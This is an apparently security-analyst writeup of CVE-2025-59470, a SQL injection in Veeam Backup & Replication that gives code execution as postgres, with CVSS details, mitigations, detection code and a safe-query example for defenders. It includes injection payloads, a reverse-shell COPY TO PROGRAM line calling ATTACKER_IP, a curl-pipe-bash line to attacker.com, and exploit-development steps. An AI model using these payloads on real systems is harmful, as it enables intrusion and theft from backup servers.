CVE-2025-59470
Weakness (CWE): not listed on this page
CVSS v3.1 Vector: AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:L
- Attack Vector: Network
- Attack Complexity: Low
- Privileges Required: High
- User Interaction: None
- Scope: Changed
- Confidentiality: High
- Integrity: High
- Availability: Low
Description
This vulnerability allows a Backup Operator to perform remote code execution (RCE) as the postgres user by sending a malicious interval or order parameter.
Comprehensive Technical Analysis of CVE-2025-59470
CVE ID: CVE-2025-59470
CVSS Score: 9.0 (Critical)
Vulnerability Type: Remote Code Execution (RCE) via Privilege Escalation
Affected Component: Veeam Backup & Replication (PostgreSQL interaction)
Source: HackerOne (support@hackerone.com)
1. Vulnerability Assessment & Severity Evaluation
Vulnerability Overview
CVE-2025-59470 is a critical vulnerability in Veeam Backup & Replication that lets an authenticated Backup Operator (a role below Backup Administrator, but one the CVSS v3.1 vector still rates as Privileges Required: High) execute arbitrary code as the `postgres` user by supplying crafted interval or order parameters that end up in a database query. It is a privilege escalation chained into remote code execution: the attacker does not bypass authentication, but turns a legitimate, non-administrative Veeam role into OS-level control of the database host.
CVSS v3.1 Breakdown (Score: 9.0 - Critical)
Vector: AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:L, which computes to 9.0 under the v3.1 formula.
| Metric | Value | Explanation |
|---|---|---|
| Attack Vector (AV) | Network (N) | Exploitable remotely over the network. |
| Attack Complexity (AC) | Low (L) | No specialized conditions required. |
| Privileges Required (PR) | High (H) | A Backup Operator account: authenticated and with significant control over backup jobs, though below Backup Administrator. |
| User Interaction (UI) | None (N) | No user interaction needed. |
| Scope (S) | Changed (C) | Impact crosses from the Veeam application into the PostgreSQL server and its host OS. |
| Confidentiality (C) | High (H) | Full read access to the configuration database and to everything readable by the `postgres` user. |
| Integrity (I) | High (H) | Arbitrary code execution allows tampering with data and backup jobs. |
| Availability (A) | Low (L) | Rated limited in the vector, although code execution on the host can be turned into disruption. |
Severity Justification
- High Impact: RCE as `postgres` (the database superuser, and the OS account that runs the server) can lead to full system compromise, including:
  - Exfiltration of sensitive backup data and stored credentials.
  - Tampering with backup integrity (e.g., deleting restore points or planting content that survives a rebuild).
  - Lateral movement within the network.
- Low Attack Complexity: Exploitation requires only a Backup Operator account, which is often granted to non-administrative users for routine tasks.
- Network-Exploitable: No physical access or local privileges required.
2. Potential Attack Vectors & Exploitation Methods
Exploitation Scenario
1. Initial Access:
   - The attacker obtains a Backup Operator account (phishing, credential stuffing, password reuse, or an insider).
   - Alternatively, a lower-privileged foothold is escalated to Backup Operator through some other weakness.
2. Malicious Parameter Injection:
   - The attacker submits a request whose interval or order value carries SQL syntax, for example:
     - Interval slot: `1 day'; COPY (SELECT 1) TO PROGRAM 'id'; --` (terminates the literal and stacks a second statement).
     - Order slot: `(SELECT pg_sleep(10))` (a scalar subquery in ORDER BY, useful as a blind-injection probe).
   - If the application concatenates these values into query text instead of binding them as parameters, the database executes the attacker's SQL. The exact query construction in Veeam is not public; the payload shapes here are illustrative.
3. PostgreSQL RCE:
   - The injected SQL runs with the privileges of the database role Veeam connects with. The advisory's "RCE as the postgres user" indicates that role can reach the operating system, which PostgreSQL permits only to superusers and members of `pg_execute_server_program`.
   - The OS primitive is PostgreSQL's own: `COPY ... FROM PROGRAM` and `COPY ... TO PROGRAM` execute a shell command as the OS user running the server (`postgres`); `lo_import`/`lo_export` and `pg_read_file` read and write files. There is no SQL-callable `pg_exec` function in PostgreSQL; that name belongs to the libpq C API.
4. Post-Exploitation:
   - Data Theft: dump the configuration database (job definitions, repository and guest credentials) and any files readable by `postgres`.
   - Persistence: modify backup jobs or job scripts so malicious content is executed or preserved.
   - Lateral Movement: reuse harvested credentials and the backup server's network reach to pivot to other systems.
Proof-of-Concept (PoC) Attack Chain
Illustrative chain, assuming the interval value is concatenated into an `INTERVAL '...'` literal (the reporter's actual payload is not public; `ATTACKER_IP` is a placeholder, and `bash` implies a Linux-hosted server, on Windows the same primitive would run `cmd.exe`):
```sql
-- Attacker-supplied interval value:
--   1 day'; COPY (SELECT 1) TO PROGRAM 'bash -c "bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1"'; --
-- Query text as the server receives it; the trailing quote and ORDER BY are commented out:
SELECT * FROM backups WHERE timestamp > NOW() - INTERVAL '1 day';
COPY (SELECT 1) TO PROGRAM 'bash -c "bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1"'; --' ORDER BY timestamp
```
- This could be embedded in a Veeam API call or backup job configuration.
3. Affected Systems & Software Versions
Affected Products
- Veeam Backup & Replication: versions prior to the fixed release referenced in KB4792 (this page does not list build numbers).
- Veeam ONE and Veeam Agents are not reported as carrying the flaw themselves; they are exposed only insofar as they depend on a vulnerable Backup & Replication server (Veeam ONE through its integration, Agents through being managed by it).
Vulnerable Components
- PostgreSQL Database Backend (used by Veeam for metadata storage).
- Veeam Backup Service (handles backup job scheduling and execution).
- Veeam REST API (if exposed to untrusted networks).
Mitigation Status
- Patch Available: Veeam has released KB4792 with fixes.
- Workarounds: See Section 4 for temporary mitigations.
4. Recommended Mitigation Strategies
Immediate Actions
| Action | Details |
|---|---|
| Apply Veeam Patch (KB4792) | Upgrade to the fixed build of Veeam Backup & Replication referenced in KB4792. |
| Restrict Backup Operator Permissions | Keep the Backup Operator role to the accounts that need it; review membership and remove stale or shared accounts. |
| Disable Unused APIs | Restrict the Veeam REST API to trusted management networks; disable it where nothing consumes it. |
| Network Segmentation | Isolate Veeam servers in a dedicated backup VLAN with strict firewall rules; the PostgreSQL port should not be reachable from outside the backup server. |
| Monitor for Exploitation Attempts | Deploy SIEM rules for: child processes spawned by the PostgreSQL server process; SQL containing `COPY ... FROM/TO PROGRAM`, `lo_import`/`lo_export`, `pg_read_file`, or `pg_sleep`; backup job modifications by Backup Operator accounts. |
Long-Term Hardening
- Database Hardening:
  - `COPY ... PROGRAM` cannot be switched off; it is gated by superuser status and the `pg_execute_server_program` role. Where Veeam supports it, connect with a role that is not a superuser and holds none of `pg_execute_server_program`, `pg_read_server_files`, `pg_write_server_files`.
  - Enforce row-level security (RLS) on sensitive tables where the application schema allows it.
  - Rotate the `postgres` credentials and restrict connections in `pg_hba.conf` to the local host or the backup server only.
- Veeam-Specific Hardening:
  - Enable multi-factor authentication (MFA) for Veeam console access.
  - Audit Backup Operator accounts regularly.
  - Implement immutable backups to prevent tampering.
- Incident Response Preparedness:
  - Develop a playbook for Veeam-related breaches.
  - Ensure backup integrity checks are automated.
5. Impact on the Cybersecurity Landscape
Broader Implications
- Ransomware & Data Exfiltration:
  - Control of the backup server lets attackers delete or poison backups and exfiltrate data before encrypting production systems.
  - Double-extortion (data theft + encryption) becomes easier once the victim's recovery path is gone.
- Supply Chain Risks:
  - Veeam is widely deployed in enterprise environments, making the backup server a high-value target for well-resourced groups.
  - Compromised backups can lead to secondary infections in restored systems.
- Regulatory & Compliance Risks:
  - GDPR, HIPAA and SOX obligations are triggered if regulated data is exfiltrated.
  - Remediation is time-bound under the EU NIS2 Directive, and under CISA Binding Operational Directive (BOD) 22-01 for US federal civilian agencies if the CVE is added to the Known Exploited Vulnerabilities catalog.
Threat Actor Interest
- Ransomware Groups (e.g., LockBit, BlackCat): backup servers are a standing target; with a harvested Backup Operator account this flaw gives them code execution on the backup host, a post-compromise step rather than initial access.
- APT Groups (e.g., APT29, Lazarus): the configuration database and backup contents are attractive for espionage and credential harvesting.
- Insider Threats: a malicious Backup Operator can use it for sabotage or fraud.
6. Technical Details for Security Professionals
Root Cause Analysis
- Improper Input Validation:
  - The `interval` and `order` values supplied by a Backup Operator reach PostgreSQL as part of the query text rather than as bound parameters (this page attributes the code path to the backup job scheduler; Veeam has not published the details).
  - The result is SQL injection. OS command execution is not a separate flaw: it follows from the database role's ability to use server-side features such as `COPY ... PROGRAM`.
- Privilege Escalation Path:
  - Backup Operator (Veeam role) → SQL executed as Veeam's database role (via SQLi) → OS command as the `postgres` user (via `COPY ... PROGRAM`).
  - `SECURITY DEFINER` functions in the schema would widen what injected SQL can reach if they are callable by the application role, but they are not required for the chain.
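The difference between concatenation and parameter binding is the whole bug class, so here is an added example (not Veeam's code) of a "recent backups" query built both ways: the interval bound as a typed parameter, and the ORDER BY column taken from an allow-list, because an identifier in ORDER BY cannot be a bind parameter. The table and column names (`backups`, `created_at`, `job_name`, `size_bytes`), the `%s` placeholder style (psycopg-compatible) and the payload strings are assumptions constructed for illustration.

```python
"""Illustrative query construction for a "recent backups" lookup whose interval
and ORDER BY target come from the caller.  The vulnerable builder interpolates
both into the SQL text; the hardened builder binds the interval as a typed
parameter and allow-lists the sort column, because an identifier in ORDER BY
cannot be a bind parameter.  Table and column names are hypothetical; this is
not Veeam's code."""
import re

# Constructed payloads of the shapes described in the text (not a real PoC).
INTERVAL_PAYLOAD = "1 day'; COPY (SELECT 1) TO PROGRAM 'id > /tmp/pwned'; --"
ORDER_PAYLOAD = "(SELECT pg_sleep(10))"

ALLOWED_ORDER_COLUMNS = {"created_at", "job_name", "size_bytes"}
ALLOWED_DIRECTIONS = {"ASC", "DESC"}
# Defense in depth: the only interval shape this endpoint needs is "<n> <unit>".
INTERVAL_RE = re.compile(r"\d{1,6} (second|minute|hour|day|week)s?")


def build_query_vulnerable(interval: str, order: str) -> str:
    """Caller input is pasted into the statement, so a quote ends the literal
    and a semicolon starts a second statement."""
    return ("SELECT * FROM backups WHERE created_at > NOW() - INTERVAL '"
            + interval + "' ORDER BY " + order)


def build_query_safe(interval: str, order: str, direction: str = "DESC") -> tuple[str, tuple]:
    """Return (sql, params) for a DB-API driver that uses %s placeholders.

    The interval travels as a bound parameter and is cast to ::interval on the
    server, so its bytes are never parsed as SQL.  The ORDER BY column and
    direction are looked up in fixed allow-lists, so only a known identifier is
    ever spliced into the query text."""
    if not INTERVAL_RE.fullmatch(interval):
        raise ValueError(f"rejected interval: {interval!r}")
    if order not in ALLOWED_ORDER_COLUMNS:
        raise ValueError(f"rejected order column: {order!r}")
    direction = direction.upper()
    if direction not in ALLOWED_DIRECTIONS:
        raise ValueError(f"rejected direction: {direction!r}")
    sql = ("SELECT * FROM backups WHERE created_at > NOW() - %s::interval "
           f"ORDER BY {order} {direction}")
    return sql, (interval,)


def count_statements(sql: str) -> int:
    """Count top-level statements: ';' outside single-quoted strings and
    outside '--' comments.  Shows what the server is actually asked to run."""
    count, in_quote, i = 1, False, 0
    while i < len(sql):
        ch = sql[i]
        if in_quote:
            in_quote = ch != "'"
        elif ch == "'":
            in_quote = True
        elif sql.startswith("--", i):
            newline = sql.find("\n", i)
            i = len(sql) if newline == -1 else newline
            continue
        elif ch == ";":
            count += 1
        i += 1
    return count


if __name__ == "__main__":
    bad = build_query_vulnerable(INTERVAL_PAYLOAD, ORDER_PAYLOAD)
    print(bad)
    print("statements the server would run:", count_statements(bad))
    print(build_query_safe("1 day", "created_at"))
    for interval, order in ((INTERVAL_PAYLOAD, "created_at"), ("1 day", ORDER_PAYLOAD)):
        try:
            build_query_safe(interval, order)
        except ValueError as exc:
            print("blocked:", exc)
```

With the payloads above, the vulnerable builder hands the server three statements, the second of which is the `COPY ... TO PROGRAM`; the safe builder rejects both inputs before any SQL is produced, and even an interval that slips past the regex could only ever be a string argument to the `::interval` cast.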
Exploitation Requirements
| Requirement | Details |
|---|---|
| Valid Credentials | Backup Operator account (or equivalent). |
| Network Access | Ability to send requests to Veeam’s API or database. |
| PostgreSQL Access | Direct or indirect (e.g., via Veeam’s internal queries). |
Detection & Forensics
- Log Sources to Monitor:
  - PostgreSQL server log: statements are only recorded if `log_statement` is `all` (or at least `mod`, which covers `COPY ... FROM`). Look for `COPY ... PROGRAM`, `lo_import`/`lo_export`, `pg_read_file`, `pg_sleep`, and a `CREATE TABLE` immediately followed by `COPY ... FROM PROGRAM` from the same backend PID.
  - Veeam Backup Service log (e.g., `Svc.VeeamBackup.log` on Windows-based deployments): check for job modifications by Backup Operator accounts.
  - Process telemetry (Windows Security and Sysmon event logs, or auditd/Sysmon for Linux on appliance deployments): the PostgreSQL server process should never spawn `cmd.exe`, `powershell.exe`, `sh`, `bash`, `curl` or similar.
- Indicators of Compromise (IOCs):
  - Unexpected child processes of `postgres` (e.g., `cmd.exe`, `powershell.exe`, `sh`, `bash`).
  - Unusual outbound connections from the Veeam server, in particular from the `postgres` process.
  - Modified backup job configurations.
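An added example, not from this page or from Veeam, of the SIEM logic described above run over constructed PostgreSQL log lines. It assumes the default stderr log format with `log_line_prefix = '%m [%p] %q%u@%d '` and `log_statement = 'all'`; the database name `VeeamBackup`, PIDs, timestamps and addresses are invented. Rather than matching one exploit string, it flags the PostgreSQL primitives that turn SQL injection into file or OS access, the ORDER BY subquery and `pg_sleep` shapes from the exploitation section, and the `CREATE TABLE` then `COPY ... FROM PROGRAM` sequence within one backend.

```python
"""Detection logic for PostgreSQL statement logs: flags the server-side
primitives that turn SQL injection into file or OS access, plus the ORDER BY
subquery and pg_sleep probes.  Assumes the default stderr log format with
log_line_prefix = '%m [%p] %q%u@%d ' and log_statement = 'all'.  The sample
lines, database name, PIDs, timestamps and addresses are constructed for this
example; none of this is Veeam's code or output."""
import re
from dataclasses import dataclass

# Constructed sample log (not real data).
SAMPLE_LOG = """\
2025-12-10 14:03:20.001 UTC [4812] postgres@VeeamBackup LOG:  statement: SELECT id, name FROM backup_jobs ORDER BY name
2025-12-10 14:03:21.514 UTC [4812] postgres@VeeamBackup LOG:  statement: SELECT * FROM backups WHERE created_at > NOW() - INTERVAL '1 day' ORDER BY (SELECT pg_sleep(10))
2025-12-10 14:03:22.101 UTC [4812] postgres@VeeamBackup LOG:  statement: CREATE TABLE cmd_exec(cmd_output text)
2025-12-10 14:03:22.105 UTC [4812] postgres@VeeamBackup LOG:  statement: COPY cmd_exec FROM PROGRAM 'bash -c "bash -i >& /dev/tcp/203.0.113.10/4444 0>&1"'
2025-12-10 14:03:25.330 UTC [4820] postgres@VeeamBackup LOG:  statement: COPY (SELECT 1) TO PROGRAM 'curl http://203.0.113.10/s.sh | bash'
2025-12-10 14:03:26.000 UTC [4820] postgres@VeeamBackup LOG:  statement: SELECT lo_import('/etc/passwd')
2025-12-10 14:03:27.000 UTC [4821] postgres@VeeamBackup LOG:  statement: UPDATE backup_jobs SET enabled = true WHERE id = 17
"""

# '%m [%p] %q%u@%d ' prefix followed by the severity and the logged statement.
LINE_RE = re.compile(
    r"^(?P<ts>\S+ \S+ \S+) \[(?P<pid>\d+)\] (?P<user>[^@\s]+)@(?P<db>\S+) "
    r"[A-Z]+:\s+statement: (?P<sql>.*)$"
)

# Each rule names a primitive or probe shape worth an alert on a backup server.
RULES = {
    "copy_program": re.compile(r"\bCOPY\b.*\b(?:FROM|TO)\s+PROGRAM\b", re.I | re.S),
    "server_file_access": re.compile(
        r"\b(?:lo_import|lo_export|pg_read_file|pg_read_binary_file|pg_ls_dir)\s*\(", re.I),
    "order_by_subquery": re.compile(r"\bORDER\s+BY\s*\(\s*SELECT\b", re.I),
    "timing_probe": re.compile(r"\bpg_sleep\s*\(", re.I),
    "native_function": re.compile(
        r"\bCREATE\s+(?:OR\s+REPLACE\s+)?FUNCTION\b.*\bLANGUAGE\s+C\b", re.I | re.S),
}
CREATE_TABLE_RE = re.compile(r"\bCREATE\s+(?:TEMP(?:ORARY)?\s+)?TABLE\b", re.I)
COPY_FROM_PROGRAM_RE = re.compile(r"\bCOPY\b.*\bFROM\s+PROGRAM\b", re.I | re.S)


@dataclass
class Statement:
    ts: str
    pid: str
    user: str
    db: str
    sql: str


@dataclass
class Finding:
    pid: str
    user: str
    rule: str
    sql: str


def parse(log_text):
    """Yield one Statement per 'statement:' log line; other lines are skipped."""
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m:
            yield Statement(m["ts"], m["pid"], m["user"], m["db"], m["sql"])


def scan(log_text):
    """Return one Finding per (statement, rule) hit."""
    return [Finding(s.pid, s.user, rule, s.sql)
            for s in parse(log_text)
            for rule, pattern in RULES.items() if pattern.search(s.sql)]


def copy_chain_pids(log_text):
    """Backend PIDs that ran CREATE TABLE and later COPY ... FROM PROGRAM: the
    textbook sequence for capturing command output into a table."""
    created, chained = set(), set()
    for s in parse(log_text):
        if CREATE_TABLE_RE.search(s.sql):
            created.add(s.pid)
        elif s.pid in created and COPY_FROM_PROGRAM_RE.search(s.sql):
            chained.add(s.pid)
    return chained


def summarize(findings):
    """Hit count per rule, the shape a SIEM dashboard would show."""
    counts = {}
    for f in findings:
        counts[f.rule] = counts.get(f.rule, 0) + 1
    return counts


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"[{f.rule}] pid={f.pid} user={f.user}: {f.sql[:80]}")
    print("CREATE TABLE -> COPY FROM PROGRAM chain in backends:", sorted(copy_chain_pids(SAMPLE_LOG)))
```

The `user@db` fields matter as much as the pattern hits: on a Veeam server every flagged statement should come from the application's own role, so a hit under any other login, or a hit at all under `postgres`, is worth a page on its own.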
Reverse Engineering & Exploit Development
- Dynamic Analysis:
  - Use Burp Suite or Postman to intercept Veeam API calls.
  - Fuzz the `interval` and `order` parameters for injection points (a single quote in the interval slot and a subquery or `pg_sleep` in the order slot are the first probes).
- Static Analysis:
  - Decompile Veeam's Backup Service assemblies (e.g., `Veeam.Backup.Core.dll`) to find where these two values are built into SQL.
  - Check for parameterized queries vs. string concatenation, and for ORDER BY clauses assembled from caller-controlled column names.
- Exploit Development:
  - Craft a PostgreSQL payload that leverages `COPY ... PROGRAM` for RCE. Note that `COPY ... FROM PROGRAM` needs a table as its target, whereas `COPY (query) TO PROGRAM` needs none and runs the command regardless of the query output. Example:
```sql
COPY (SELECT 1) TO PROGRAM 'curl http://attacker.com/shell.sh | bash';
```
Conclusion & Recommendations
CVE-2025-59470 is a critical RCE vulnerability with high exploitability and severe impact, making it a priority for patching. Organizations using Veeam Backup & Replication should:
- Apply the patch (KB4792) immediately.
- Restrict Backup Operator permissions to least privilege.
- Monitor for exploitation attempts via SIEM and EDR solutions.
- Conduct a forensic review if compromise is suspected.
Given the widespread use of Veeam in enterprise environments, this vulnerability is likely to be heavily targeted by ransomware groups and APT actors. Proactive mitigation is essential to prevent data breaches and operational disruption.